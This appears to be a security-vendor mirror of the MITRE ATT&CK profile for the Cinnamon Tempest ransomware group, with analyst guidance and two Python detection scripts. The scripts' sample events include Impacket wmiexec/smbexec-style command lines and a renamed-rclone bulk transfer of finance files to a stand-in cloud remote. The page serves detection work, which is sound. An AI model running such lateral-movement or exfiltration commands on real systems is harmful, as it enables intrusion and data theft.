G1021: Cinnamon Tempest
Cinnamon Tempest is a China-based threat group that has been active since at least 2021 deploying multiple strains of ransomware based on the leaked Babuk source code. Cinnamon Tempest does not operate their ransomware on an affiliate model or purchase access but appears to act independently in all stages of the attack lifecycle. Based on victimology, the short lifespan of each ransomware variant, and use of malware attributed to government-sponsored threat groups, Cinnamon Tempest may be motivated by intellectual property theft or cyberespionage rather than financial gain.[1][2][3][4]
Analyst context for executives and security teams
Cinnamon Tempest matters because ATT&CK describes a ransomware-deploying group whose activity may also support intellectual property theft or cyberespionage rather than simple financial extortion. For leaders, the practical issue is not just ransomware recovery; it is whether the organization can detect credential abuse, lateral movement, tool staging, cloud-storage exfiltration, and disruption risk before encryption or data loss decisions become urgent.
Executive priority
Prioritize this as a resilience and sensitive-data risk scenario. The ATT&CK relationships point to valid account abuse, public-facing application exploitation, Windows administrative execution, Group Policy modification, file transfer, proxy/tunneling, exfiltration to cloud storage, and ransomware affecting Windows and ESXi. Executives should ask whether identity controls, internet-facing vulnerability management, backup/restore readiness, ESXi recovery, and incident response decision authority are tested together—not treated as separate control domains.
Technical view
MITRE provides no group-level detection text, so coverage should be validated from the related techniques and software. SOC and IR teams should test visibility for Windows execution via WMI, PowerShell, and command shell; lateral movement over SMB/admin shares; domain account misuse; GPO and Windows service changes; ingress tool transfer; proxy or tunneled C2; Rclone-like cloud-storage transfers; and ransomware-relevant activity on Windows and ESXi. Relationship context includes PlugX, Cobalt Strike, Impacket, Sliver, Pandora, Rclone, Cheerscrypt, and HUI Loader, so detections should focus on behaviors and control-plane evidence rather than relying only on tool names or hashes.
Likely telemetry
- Identity provider and Active Directory authentication logs, including privileged and domain account activity
- Endpoint process, command-line, PowerShell, WMI, service creation/modification, and DLL loading telemetry on Windows systems
- SMB, Windows admin share, and SYSVOL/GPO change evidence
- EDR or host telemetry for tool staging, script execution, deobfuscation, and unusual file writes
- Network proxy, DNS, firewall, and flow logs for proxying, tunneling, external tool transfer, and C2-like patterns
Detection direction
- Validate detections against behavior chains: public-facing access or credential abuse followed by administrative execution, lateral movement, tool transfer, exfiltration, and ransomware staging.
- Tune for legitimate administration noise around WMI, PowerShell, Windows command shell, SMB admin shares, GPO changes, and Windows service changes; require context such as account role, source host, timing, and change ticket status.
- Do not depend solely on signatures for Cobalt Strike, Sliver, Impacket, Rclone, PlugX, HUI Loader, Pandora, or Cheerscrypt because several are legitimate or dual-use tools and may vary by deployment.
- Confirm visibility into ESXi and virtualization management planes if they support critical workloads, since related ransomware context includes ESXi as well as Windows.
- Correlate cloud-storage egress and Rclone-like behavior with endpoint execution and identity context to distinguish approved synchronization from suspicious bulk transfer.
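The tool-agnostic approach in the list above (and the customised Impacket wmiexec.py with renamed output files that the technique table records) can be made concrete. The following Python is an added example, not code from the ATT&CK page, from MITRE, or from any vendor product: it scores Windows process-creation and service-install events on the structure of Impacket-style execution (the WMI provider host spawning a quiet cmd.exe that redirects output to an admin share on 127.0.0.1; a service whose image path is a %COMSPEC% one-liner that stages a batch file) rather than on tool names, hashes, or the default `__<timestamp>` output file name. Field names loosely follow Sysmon event 1 and System event 7045; hosts, accounts and command lines are constructed for the example.

```python
"""Behaviour-based detection of Impacket-style lateral movement (wmiexec / smbexec).

Added example; not code from the ATT&CK page or from any vendor product. Events
are constructed for the example and their field names loosely follow Sysmon
event 1 (process create) and System event 7045 (service install).
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Output redirected to an admin share on the loopback address is the load-bearing
# artefact: both wmiexec.py and smbexec.py collect command output this way. The
# output file name is deliberately not part of the pattern, because a customised
# build that renames the default "__<timestamp>" file must still match.
LOOPBACK_ADMIN_SHARE = re.compile(
    r"\\\\(?:127\.0\.0\.1|localhost)\\(?:ADMIN\$|C\$)\\[^\s\"']*", re.I)
OUTPUT_REDIRECT = re.compile(r"(?:1|2)?>\s*\\\\")        # e.g. "1> \\127.0.0.1\..."
STDERR_MERGE = re.compile(r"2\^?>\^?&\^?1")              # "2>&1" or batch-escaped "2^>^&1"
QUIET_CMD = re.compile(r"(?:cmd(?:\.exe)?|%COMSPEC%)\s+/Q\s+/c", re.I)


@dataclass
class Event:
    host: str
    user: str
    event_id: int                # 1 = process create, 7045 = service installed
    image: str = ""              # created process, or the service's image path for 7045
    command_line: str = ""
    parent_image: str = ""
    service_name: str = ""


@dataclass
class Finding:
    rule: str
    host: str
    user: str
    evidence: str
    reasons: List[str] = field(default_factory=list)


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: Event) -> Optional[Finding]:
    """Return a Finding for wmiexec- or smbexec-shaped activity, else None."""
    if ev.event_id == 1:
        cl = ev.command_line
        wmi_parent = (_base(ev.parent_image) == "wmiprvse.exe"
                      and _base(ev.image) in ("cmd.exe", "powershell.exe"))
        loopback_redirect = bool(LOOPBACK_ADMIN_SHARE.search(cl) and OUTPUT_REDIRECT.search(cl))
        # Structural core: WMI provider host spawns a shell whose output lands on a
        # loopback admin share. Either fact alone is common in legitimate administration.
        if wmi_parent and loopback_redirect:
            reasons = ["spawned by WMI provider host",
                       "stdout redirected to loopback admin share"]
            if QUIET_CMD.search(cl):
                reasons.append("quiet non-interactive shell (/Q /c)")
            if STDERR_MERGE.search(cl):
                reasons.append("stderr merged into output file")
            return Finding("wmiexec-like execution", ev.host, ev.user, cl, reasons)
    elif ev.event_id == 7045:
        path = ev.image
        if QUIET_CMD.search(path) and LOOPBACK_ADMIN_SHARE.search(path):
            reasons = ["service image is a %COMSPEC% one-liner",
                       "writes output to loopback admin share"]
            if "echo" in path.lower() and ".bat" in path.lower():
                reasons.append("stages a batch file via echo (smbexec pattern)")
            return Finding("smbexec-like service install", ev.host, ev.user,
                           f"{ev.service_name}: {path}", reasons)
    return None


def hunt(events: List[Event]) -> List[Finding]:
    return [f for f in map(classify, events) if f is not None]


# Constructed sample telemetry (not real victim data).
SAMPLE_EVENTS = [
    # stock wmiexec.py: default "__<timestamp>" output file
    Event("WS01", r"CORP\jsmith", 1, r"C:\Windows\System32\cmd.exe",
          r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1700000000.123456 2>&1",
          r"C:\Windows\System32\wbem\WmiPrvSE.exe"),
    # customised wmiexec.py with a renamed output file: still matches
    Event("WS01", r"CORP\jsmith", 1, r"C:\Windows\System32\cmd.exe",
          r'cmd.exe /Q /c net group "Domain Admins" /domain 1> \\127.0.0.1\ADMIN$\winupdate.log 2>&1',
          r"C:\Windows\System32\wbem\WmiPrvSE.exe"),
    # smbexec.py service install (default service name BTOBTO)
    Event("FS02", "SYSTEM", 7045, service_name="BTOBTO",
          image=r"%COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & "
                r"%COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat"),
    # benign: management agent running a script through WMI, no loopback share
    Event("WS03", "SYSTEM", 1, r"C:\Windows\System32\cmd.exe",
          r'cmd.exe /c "C:\Program Files\Vendor\inventory.bat"',
          r"C:\Windows\System32\wbem\WmiPrvSE.exe"),
    # benign: ordinary service install
    Event("FS02", "SYSTEM", 7045, service_name="VendorAgent",
          image=r"C:\Program Files\Vendor\agent.exe"),
    # benign: admin redirecting output to a real file server from an interactive shell
    Event("WS04", r"CORP\admin1", 1, r"C:\Windows\System32\cmd.exe",
          r"cmd.exe /c dir C:\ > \\fileserver\share\out.txt",
          r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.host} {f.user}: {f.evidence}\n    " + "; ".join(f.reasons))
```

The design choice is that the loopback admin-share redirect and the WmiPrvSE.exe parent are required together, so management agents that launch scripts through WMI and administrators who redirect output to real file servers both stay quiet, while a rebuilt wmiexec.py that changes its output file name is still caught. Feed the same rule the 4688 and 7045 events from your own collector once the field mapping is adjusted.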
Mitigation priorities
- Harden identity first: enforce least privilege, privileged access review, strong authentication, service account governance, and rapid credential revocation procedures.
- Reduce initial-access exposure through disciplined patching, configuration review, and monitoring of internet-facing applications and services.
- Restrict and monitor administrative pathways such as SMB admin shares, WMI, PowerShell, remote command execution, GPO modification, and service creation.
- Control tool transfer and exfiltration paths with egress governance, cloud-storage usage policy, proxy logging, and alerting on unusual transfer patterns.
- Prepare for ransomware operations by validating immutable/offline backups, ESXi recovery procedures, segmentation, and executive incident decision playbooks.
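For the exfiltration-path control above, and the related detection point that Rclone-like behaviour should be correlated with endpoint execution and identity context, here is an added Python example, not code from the ATT&CK page or from any product. It flags rclone-style command lines by their transfer verb, `remote:path` argument and flags rather than by binary name (a renamed rclone binary is the common case), joins them to same-host egress toward object-storage domains inside a short window, and suppresses only (host, account, remote) triples on an explicit approved-job list. The process events, egress records, approved-job set and domain-suffix list are all constructed or assumed for the example.

```python
"""Correlate Rclone-like transfers with cloud-storage egress and identity context.

Added example; not code from the ATT&CK page or from any vendor product. The
process events, egress records, approved-job list and the cloud-storage domain
suffixes are constructed or assumed for the example and should be replaced with
your own telemetry and sanctioned remotes.
"""
import re
from datetime import datetime, timedelta

# rclone sub-commands that move data. The binary name is deliberately ignored:
# a renamed copy dropped into a user-writable directory is the common case.
TRANSFER_VERB = re.compile(r"(?<!\S)(?:copy|copyto|sync|move|moveto)(?!\S)", re.I)
# "remote:path" arguments; drive letters (C:\) and URLs (https://) are excluded.
REMOTE_TOKEN = re.compile(r"(?<!\S)([A-Za-z][A-Za-z0-9_-]*):(?![\\/])\S*")
RCLONE_FLAGS = ("--config", "--transfers", "--ignore-existing", "--auto-confirm",
                "--multi-thread-streams", "--no-check-certificate", " -P ")
# Object-storage domain suffixes to correlate against (illustrative, not exhaustive).
CLOUD_STORAGE_SUFFIXES = (".aliyuncs.com", ".amazonaws.com", ".blob.core.windows.net",
                          ".digitaloceanspaces.com", ".backblazeb2.com",
                          "storage.googleapis.com", "mega.nz")
CORRELATION_WINDOW = timedelta(minutes=30)
HIGH_VOLUME_BYTES = 1 << 30          # 1 GiB within the window


def is_rclone_like(cmdline: str):
    """Return the remote name when a command line looks like an rclone transfer."""
    if not TRANSFER_VERB.search(cmdline):
        return None
    m = REMOTE_TOKEN.search(cmdline)
    if m is None:
        return None
    # verb + remote:path is the core; one rclone-style flag raises confidence enough
    if not any(flag in cmdline for flag in RCLONE_FLAGS):
        return None
    return m.group(1)


def is_cloud_storage(domain: str) -> bool:
    d = domain.lower()
    return any(d == s.lstrip(".") or d.endswith(s if s.startswith(".") else "." + s)
               for s in CLOUD_STORAGE_SUFFIXES)


def correlate(process_events, egress_records, approved_jobs):
    """Pair each rclone-like execution with same-host cloud-storage egress that
    follows it inside CORRELATION_WINDOW, then apply the approved-job allowlist."""
    alerts, suppressed = [], []
    for ev in process_events:
        remote = is_rclone_like(ev["cmdline"])
        if remote is None:
            continue
        start = datetime.fromisoformat(ev["time"])
        hits = [e for e in egress_records
                if e["host"] == ev["host"] and is_cloud_storage(e["dest"])
                and start <= datetime.fromisoformat(e["time"]) <= start + CORRELATION_WINDOW]
        total = sum(e["bytes_out"] for e in hits)
        record = {"host": ev["host"], "user": ev["user"], "remote": remote,
                  "dests": sorted({e["dest"] for e in hits}), "bytes_out": total,
                  "cmdline": ev["cmdline"]}
        # Identity context: only a known (host, account, remote) triple is "approved sync".
        if (ev["host"], ev["user"], remote) in approved_jobs:
            suppressed.append(record)
            continue
        # No observed egress still alerts: the transfer may have used a path the proxy
        # does not see, so the command line alone is worth a medium-severity alert.
        record["severity"] = "high" if total >= HIGH_VOLUME_BYTES else "medium"
        alerts.append(record)
    return alerts, suppressed


# Constructed sample telemetry (not real victim data).
PROCESS_EVENTS = [
    {"host": "WS07", "user": r"CORP\jsmith", "time": "2024-03-04T02:13:05",
     "cmdline": r"C:\Users\Public\svchost.exe copy C:\Finance\Q4 oss:corp-dump-1 "
                r"--config C:\Users\Public\rc.conf --transfers 32 --ignore-existing"},
    {"host": "BACKUP01", "user": r"CORP\svc-backup", "time": "2024-03-04T01:00:02",
     "cmdline": r"C:\Tools\rclone\rclone.exe sync D:\Backups s3backup:corp-backups "
                r"--config C:\Tools\rclone\rclone.conf --transfers 8"},
    {"host": "WS11", "user": r"CORP\mlee", "time": "2024-03-04T08:30:00",
     "cmdline": r"C:\Windows\System32\cmd.exe /c copy C:\docs\a.txt D:\b.txt"},
]
EGRESS_RECORDS = [
    {"host": "WS07", "dest": "corp-dump-1.oss-cn-hangzhou.aliyuncs.com",
     "bytes_out": 4_800_000_000, "time": "2024-03-04T02:14:10"},
    {"host": "WS07", "dest": "www.example.com", "bytes_out": 12_000, "time": "2024-03-04T02:15:00"},
    {"host": "WS07", "dest": "files.oss-cn-hangzhou.aliyuncs.com",
     "bytes_out": 900_000, "time": "2024-03-04T09:00:00"},   # outside the window
    {"host": "BACKUP01", "dest": "corp-backups.s3.amazonaws.com",
     "bytes_out": 120_000_000_000, "time": "2024-03-04T01:02:00"},
]
APPROVED_JOBS = {("BACKUP01", r"CORP\svc-backup", "s3backup")}

if __name__ == "__main__":
    alerts, suppressed = correlate(PROCESS_EVENTS, EGRESS_RECORDS, APPROVED_JOBS)
    for a in alerts:
        print(f"[{a['severity']}] {a['host']} {a['user']} remote={a['remote']} "
              f"bytes_out={a['bytes_out']} dests={a['dests']}")
    print(f"{len(suppressed)} approved sync job(s) suppressed")
```

The allowlist is keyed on the account and the rclone remote as well as the host, so a domain-admin account running the same sanctioned binary against an unfamiliar remote is not suppressed; this is the identity-context check the detection list above asks for. The `cmd.exe /c copy` line shows why a bare transfer verb is not enough on its own.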
Analyst notes and limits
The most decision-relevant point is the overlap between ransomware operations and the possible intellectual-property or espionage motivation that MITRE notes: response planning should cover both restoration and a data-compromise investigation, not restoration alone. The related techniques emphasize identity, Windows administration, cloud-storage exfiltration, and virtualization risk; these are the control areas most likely to determine whether defenders see the activity early.
The group object has no specified platforms, tactics, or official detection text. Platform and tactic guidance above is inferred only from supplied ATT&CK relationships to techniques and software, not from a complete procedure list. Local telemetry, asset exposure, and business process context are required before assessing actual risk or detection coverage.
Cinnamon Tempest
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1047 | Windows Management Instrumentation | Cinnamon Tempest has used Impacket for lateral movement via WMI. (Citation: Microsoft Ransomware as a Service) (Citation: Sygnia Emperor Dragonfly October 2022) |
| Enterprise | T1574.001 | DLL | Cinnamon Tempest has used search order hijacking to launch Cobalt Strike Beacons. (Citation: Microsoft Ransomware as a Service) (Citation: SecureWorks BRONZE STARLIGHT Ransomware Operations June 2022) Cinnamon Tempest has also abused legitimate executables to side-load weaponized DLLs. (Citation: Sygnia Emperor Dragonfly October 2022) |
| Enterprise | T1105 | Ingress Tool Transfer | Cinnamon Tempest has downloaded files, including Cobalt Strike, to compromised hosts. (Citation: Sygnia Emperor Dragonfly October 2022) |
| Enterprise | T1484.001 | Group Policy Modification | Cinnamon Tempest has used Group Policy to deploy batch scripts for ransomware deployment. (Citation: Microsoft Ransomware as a Service) |
| Enterprise | T1567.002 | Exfiltration to Cloud Storage | Cinnamon Tempest has uploaded captured keystroke logs to the Alibaba Cloud Object Storage Service (Aliyun OSS). (Citation: Sygnia Emperor Dragonfly October 2022) |
| Enterprise | T1588.002 | Tool | Cinnamon Tempest has used open-source tools including customized versions of the Iox proxy tool, the NPS tunneling tool, Meterpreter, and a keylogger that uploads data to Alibaba cloud storage. (Citation: Sygnia Emperor Dragonfly October 2022) (Citation: SecureWorks BRONZE STARLIGHT Ransomware Operations June 2022) |
| Enterprise | T1078 | Valid Accounts | Cinnamon Tempest has used compromised user accounts to deploy payloads and create system services. (Citation: Sygnia Emperor Dragonfly October 2022) |
| Enterprise | T1657 | Financial Theft | Cinnamon Tempest has maintained leak sites for exfiltrated data in an attempt to extort victims into paying a ransom. (Citation: Microsoft Ransomware as a Service) |
| Enterprise | T1090 | Proxy | Cinnamon Tempest has used a customized version of the Iox port-forwarding and proxy tool. (Citation: Sygnia Emperor Dragonfly October 2022) |
| Enterprise | T1078.002 | Domain Accounts | Cinnamon Tempest has obtained highly privileged credentials, such as domain administrator, in order to deploy malware. (Citation: Microsoft Ransomware as a Service) |
| Enterprise | T1190 | Exploit Public-Facing Application | Cinnamon Tempest has exploited multiple unpatched vulnerabilities for initial access, including vulnerabilities in Microsoft Exchange, ManageEngine ADSelfService Plus, Confluence, and Log4j. (Citation: Microsoft Ransomware as a Service) (Citation: Microsoft Log4j Vulnerability Exploitation December 2021) (Citation: Sygnia Emperor Dragonfly October 2022) (Citation: SecureWorks BRONZE STARLIGHT Ransomware Operations June 2022) |
| Enterprise | T1059.006 | Python | Cinnamon Tempest has used a customized version of the Impacket wmiexec.py module that writes its output to renamed files. (Citation: Microsoft Ransomware as a Service) |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Cinnamon Tempest has used weaponized DLLs to load and decrypt payloads. (Citation: Sygnia Emperor Dragonfly October 2022) |
| Enterprise | T1021.002 | SMB/Windows Admin Shares | Cinnamon Tempest has used SMBexec for lateral movement. (Citation: Sygnia Emperor Dragonfly October 2022) |
| Enterprise | T1572 | Protocol Tunneling | Cinnamon Tempest has used the Iox and NPS proxy and tunneling tools in combination to create multiple connections through a single tunnel. (Citation: Sygnia Emperor Dragonfly October 2022) |
| Enterprise | T1080 | Taint Shared Content | Cinnamon Tempest has deployed ransomware from a batch file in a network share. (Citation: Microsoft Ransomware as a Service) |
| Enterprise | T1543.003 | Windows Service | Cinnamon Tempest has created system services to establish persistence for deployed tooling. (Citation: Sygnia Emperor Dragonfly October 2022) |
| Enterprise | T1059.001 | PowerShell | Cinnamon Tempest has used PowerShell to communicate with C2, download files, and execute reconnaissance commands. (Citation: Sygnia Emperor Dragonfly October 2022) |
| Enterprise | T1059.003 | Windows Command Shell | Cinnamon Tempest has executed ransomware using batch scripts deployed via GPO. (Citation: Microsoft Ransomware as a Service) |
Groups, software, and campaigns
S0633: Sliver
S0664: Pandora
Pandora is a multistage kernel rootkit with backdoor functionality that has been in use by Threat Group-3390 since at least 2020.[1]
S0013: PlugX
S1096: Cheerscrypt
Cheerscrypt is a ransomware that was developed by Cinnamon Tempest and has been used in attacks against ESXi and Windows environments since at least 2022. Cheerscrypt was derived from the leaked Babuk source code and has infrastructure overlaps with deployments of Night Sky ransomware, which was also derived from Babuk.[1][2]
S0357: Impacket
S0154: Cobalt Strike
Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.[1]
In addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz.[1]
S1097: HUI Loader
HUI Loader is a custom DLL loader that has been used since at least 2015 by China-based threat groups including Cinnamon Tempest and menuPass to deploy malware on compromised hosts. HUI Loader has been observed in campaigns loading SodaMaster, PlugX, Cobalt Strike, Komplex, and several strains of ransomware.[1]
S1040: Rclone
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, the table compares the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources (Updates).
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | c8ebd5578d48… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] Microsoft Ransomware as a Service: Microsoft. (2022, May 9). Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself. Retrieved March 10, 2023.
- [2] Microsoft Threat Actor Naming July 2023: Microsoft. (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
- [3] Trend Micro Cheerscrypt May 2022: Dela Cruz, A. et al. (2022, May 25). New Linux-Based Ransomware Cheerscrypt Targeting ESXi Devices Linked to Leaked Babuk Source Code. Retrieved December 19, 2023.
- [4] SecureWorks BRONZE STARLIGHT Ransomware Operations June 2022: Counter Threat Unit Research Team. (2022, June 23). BRONZE STARLIGHT Ransomware Operations Use HUI Loader. Retrieved December 7, 2023.
- [5] BRONZE STARLIGHT (associated group name; Citation: Dell SecureWorks BRONZE STARLIGHT Profile)
- [6] DEV-0401 (associated group name; Citation: Microsoft Threat Actor Naming July 2023)
- [7] Dell SecureWorks BRONZE STARLIGHT Profile: SecureWorks. (n.d.). BRONZE STARLIGHT. Retrieved December 6, 2023.
- [8] Emperor Dragonfly (associated group name; Citation: Sygnia Emperor Dragonfly October 2022)
- [9] Sygnia Emperor Dragonfly October 2022: Biderman, O. et al. (2022, October 3). Revealing Emperor Dragonfly: Night Sky and Cheerscrypt - A Single Ransomware Group. Retrieved December 6, 2023.
- [10] mitre-attack G1021 (MITRE ATT&CK source object)
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.